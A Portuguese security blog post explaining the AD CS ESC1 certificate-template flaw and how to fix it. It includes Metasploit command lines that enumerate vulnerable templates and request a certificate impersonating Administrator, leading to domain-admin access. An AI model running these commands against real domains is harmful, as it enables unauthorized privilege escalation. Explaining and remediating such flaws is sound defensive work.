Análise Técnica
O Active Directory Certificate Services (AD CS) utiliza “Templates” para definir as regras de emissão de certificados. A vulnerabilidade ESC1 (classificação do whitepaper “Certified Pre-Owned”) ocorre quando um template possui uma combinação tóxica de configurações:
- Permite que usuários de baixo privilégio solicitem o certificado (Enrollment rights).
- Não exige aprovação de um gerente (Manager Approval: False).
- Permite autenticação de cliente (Client Authentication EKU).
- Crucialmente: Possui a flag CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT habilitada.
Esta flag permite que o solicitante especifique o Subject Alternative Name (SAN) na requisição. Um usuário comum pode solicitar um certificado usando esse template, mas especificar no campo SAN o nome de usuário “Administrator” ou “Domain Admins”. O AD CS emite o certificado validamente, e o atacante pode usá-lo para logar via Kerberos (PKINIT) como Administrador.
Mapeamento e Exploração com Metasploit
O Metasploit introduziu módulos específicos para interagir com AD CS e explorar essas configurações.
- Módulo de Enumeração: auxiliary/gather/ldap_esc_vulnerable_cert_finder
- Módulo de Exploração: auxiliary/admin/dcerpc/icpr_cert
Cenário de Exploração Detalhado:
- Descoberta:
O atacante varre o LDAP em busca de templates vulneráveis.
Bash
msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder
msf6 auxiliary(esc_finder) > run
Suponha que ele encontre o template “UserAuthentication” vulnerável a ESC1. - Exploração:
O atacante usa o módulo icpr_cert para forjar a identidade.
Bashmsf6 > use auxiliary/admin/dcerpc/icpr_cert
msf6 auxiliary(icpr_cert) > set CA ca-servidor.empresa.local\Nome-da-CA
msf6 auxiliary(icpr_cert) > set CERT_TEMPLATE UserAuthentication
msf6 auxiliary(icpr_cert) > set ALT_NAME Administrator@empresa.local
msf6 auxiliary(icpr_cert) > run
3. Acesso:
O módulo retorna o certificado (.pfx) e a chave privada. O atacante converte isso em um TGT Kerberos e acessa o domínio como Administrador.
Remediação e Defesa em Profundidade
- Higiene de Templates: Auditar todos os templates de certificado. Remover a opção “Supply in the request” da aba “Subject Name” para qualquer template que permita inscrição de usuários ou computadores padrão. Se necessário, crie templates restritos separados para administradores que precisam dessa função.
Monitoramento: Monitorar logs do AD CS para requisições onde o Requester (quem pediu) difere do Subject (para quem é o certificado).
Apaixonado por tecnologia e segurança cibernética, com mais de 17 anos de experiencia na área atuando tecnicamente como Analista de Suporte de TI, Desenvolvedor, Infraetrutura e Segurança da Informação. Com sólida trajetória na área de Tecnologia da Informação e foco em Cibersegurança, dedico-me a identificar e mitigar vulnerabilidades críticas que ameaçam a continuidade de negócios, assim como atuo na governança baseada nos principais frameworks (ISO/IEC27001, ISO/IEC42000, NIST 800-115, PCIDSS etc.).
No responses yet